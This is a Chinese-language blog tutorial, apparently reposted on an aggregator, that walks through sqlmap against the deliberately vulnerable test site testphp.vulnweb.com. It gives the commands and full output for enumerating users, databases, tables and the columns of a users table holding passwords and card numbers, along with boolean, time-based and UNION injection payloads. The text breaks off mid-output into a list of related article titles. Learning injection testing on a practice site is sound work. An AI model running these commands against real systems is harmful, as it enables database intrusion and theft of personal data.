sql注入漏洞--sqlmap使用

Posted 南岸青栀*

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入漏洞--sqlmap使用相关的知识,希望对你有一定的参考价值。

文章目录

sql注入漏洞–sqlmap使用

sqlmap工具获取:

基于python,需要有python环境

https://sqlmap.org/

基本流程:

  • 1.找到有数据库交互的功能页面
  • 2.判断页面是否存在sql注入
  • 3.利用sql注入漏洞读取数据
  • 4.导出所需数据保存

实战

http://testphp.vulnweb.com/artists.php?artist=1

在这里插入图片描述

get请求

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:18 /2021-06-16/

[16:15:19] [INFO] resuming back-end DBMS 'mysql'
[16:15:19] [INFO] testing connection to the target URL
[16:15:20] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:20] [INFO] fetching database users
          
          
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
database management system users [1]:
[*] 'acuart'@'localhost'
++++++++++++++++++++++++++++++++++++++hear!!!++++++++++++++++++++++++++++
          
          
[16:15:20] [INFO] fetched data logged to text files under 'C:\\Users\\Lenovo\\AppData\\Local\\sqlmap\\output\\testphp.vulnweb.com'

[*] ending @ 16:15:20 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

       ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:02 /2021-06-16/

[16:15:02] [INFO] resuming back-end DBMS 'mysql'
[16:15:02] [INFO] testing connection to the target URL
[16:15:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[16:15:03] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:15:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[16:15:03] [INFO] fetching database names
[16:15:04] [WARNING] the SQL query provided does not return any output
[16:15:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:15:04] [INFO] fetching number of databases
[16:15:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:15:04] [INFO] retrieved: 0
[16:15:07] [ERROR] unable to retrieve the number of databases
[16:15:07] [INFO] falling back to current database
[16:15:07] [INFO] fetching current database



+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++++++++++++++++++++++++++++++++
available databases [1]:
[*] acuart
+++++++++++++++++++++++++++++++++++++++++hear!!!!!++++++++++++++++++++++++++++++++++++++


[16:15:08] [INFO] fetched data logged to text files under 'C:\\Users\\Lenovo\\AppData\\Local\\sqlmap\\output\\testphp.vulnweb.com'

[*] ending @ 16:15:08 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db

查看当前用户和当前的数据库

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:20:04 /2021-06-16/

[16:20:05] [INFO] resuming back-end DBMS 'mysql'
[16:20:05] [INFO] testing connection to the target URL
[16:20:05] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:20:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12


++++++++++++++++++++++++++++++++++++hear!!!+++++++++++++++++++++++++++++++++++++++++++++++++++
[16:20:05] [INFO] fetching current user
current user: 'acuart@localhost'
[16:20:06] [INFO] fetching current database
current database: 'acuart'
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


[16:20:06] [INFO] fetched data logged to text files under 'C:\\Users\\Lenovo\\AppData\\Local\\sqlmap\\output\\testphp.vulnweb.com'

[*] ending @ 16:20:06 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"

读取数据库表信息

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:24:19 /2021-06-16/

[16:24:20] [INFO] resuming back-end DBMS 'mysql'
[16:24:20] [INFO] testing connection to the target URL
[16:24:21] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:24:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[16:24:21] [INFO] fetching tables for database: 'acuart'




++++++++++++++++++++++++++++++++++hear!!!+++++++++++++++++++++++++++++++++
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
++++++++++++++++++++++++++++++++++hear!!!+++++++++++++++++++++++++++++++++




[16:24:21] [INFO] fetched data logged to text files under 'C:\\Users\\Lenovo\\AppData\\Local\\sqlmap\\output\\testphp.vulnweb.com'

[*] ending @ 16:24:21 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"

读取目标数据库目标数据表列信息

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.5.1#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:28:18 /2021-06-16/

[16:28:19] [INFO] resuming back-end DBMS 'mysql'
[16:28:19] [INFO] testing connection to the target URL
[16:28:20] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2604=2604

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6108 FROM (SELECT(SLEEP(5)))zpTG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1284 UNION ALL SELECT NULL,CONCAT(0x7170627671,0x476b6d785276474b454b7676716c776b6a666e56574777456f7a6577445a766b656f6e596a7a5567,0x7178707871),NULL-- -
---
[16:28:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[16:28:20] [INFO] fetching columns for table 'users' in database 'acuart'


+++++++++++++++++++++++++++++++++++++hear!!!!++++++++++++++++++++++++++++++++++
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
+++++++++++++++++++++++++++++++++++++hear!!!!++++++++++++++++++++++++++++++++++




[16:28:20] [INFO] fetched data logged to text files under 'C:\\Users\\Lenovo\\AppData\\Local\\sqlmap\\output\\testphp.vulnweb.com'

[*] ending @ 16:28:20 /2021-06-16/

命令:python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"

读取具体的数据数量

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5.1#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap 墨者靶场 SQL注入漏洞测试(布尔盲注)


 SQLiScanner:一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具


 使用sqlmap对某php网站进行注入实战及安全防范


 sqlmap工具与sql注入漏洞测试


 第三天--注入攻击:Web安全之SQL注入漏洞专题


 漏洞防范:搭建漏洞靶场DVWA,DVWA之SQL注入漏洞,利用sqlmap把复杂的程序自动化